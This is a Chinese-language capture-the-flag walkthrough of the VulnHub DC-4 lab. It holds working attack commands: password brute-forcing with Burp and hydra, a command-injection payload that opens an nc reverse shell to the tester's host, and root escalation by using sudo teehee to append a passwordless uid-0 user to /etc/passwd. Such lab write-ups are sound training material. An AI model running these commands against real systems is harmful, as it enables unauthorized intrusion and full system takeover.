靶场地址
https://download.vulnhub.com/dc/DC-4.zip
目标
获取flag
漏洞复现
flag
sudo arp-scan -l
# 探测主机存活
nmap -p- 192.168.222.139 --min-rate=5000
# 扫描开放端口
http://192.168.222.139:80
根据登陆页面提醒,使用BurpSuite爆破admin用户的密码
admin/happy
登陆进去后,发现有“command”工具,进入查看,点击“run”,发现执行了“ls -l”命令,再次时候BP抓包
构造命令来反弹shell
kali: nc -lvvp 8888
bp:radio=nc+-e+/bin/bash+192.168.222.128+8888&submit=%E8%B7%91
python -c "import pty;pty.spawn('/bin/bash')"
# 根据我们习惯,更换一个交互式命令模式
更换到home目录下,查看信息
cd ../../../../home
ls -al
cd jim
ls
cat test.sh
cat mbox
cat backups
cd mabkups
ls
cat old-passwords.bak
通过test.sh脚本的提示信息,再加上查看发现的backups目录当中有密码信息,通过得到的三个用户名信息,再加上这个密码信息,可以尝试ssh爆破登录,观察是否可成功爆破出ssh用户的登录密码
hydra -L user.txt -P passwd.txt ssh://192.168.222.139
# 使用hydra工具爆破ssh账号密码
jim/jibril04
ssh jim@192.168.222.139
jibril04
# 使用SSH连接
ls
cat mbox
# 发现jim有邮件
cd var/spool/mail
# 进入用邮件目录下
ls
cat jim
# 发现邮件内容 Charles/^xHhA&hvim0y
su charles(记得用小写,因为写信人开头字母要大写)
^xHhA&hvim0y
sudo -l
# 查看可以sudo执行的命令
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
# 看到teehee,那我们可以用teehee写一些信息到/etc/passwd里面
su admin
id
# 切换到admin用户
cd /root
ls
cat flag.txt
总结
1、Hydra(暴力破解密码工具)
基本语法:
Hydra [-l 用户名|–L 用户名文件路径] [-p 密码|–P 密码文件路径] [-t 线程数] [–vV 显示详细信息] [–o 输出文件路径] [–f 找到密码就停止] [–e ns 空密码和指定密码试探] [ip|-M ip列表文件路径]
常用参数:
-l # LOGIN 指定破解的用户,对特定用户破解。
-L # FILE 指定用户名字典。
-p # PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P # FILE 大写,指定密码字典。
-M # FILE 指定目标列表文件一行一条。
-o # FILE 指定结果输出文件。
hydra -L user.txt -P passwd.txt ssh://192.168.222.139
# 使用hydra工具爆破192.168.222.139的ssh账号密码
2、添加新用户提权
设置uid和gid都为0,那么这个用户就相当于root
格式:[用户名]:[密码]:[uid]:[gid]:[身份描述]:[主目录]:[登录的 shell]
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd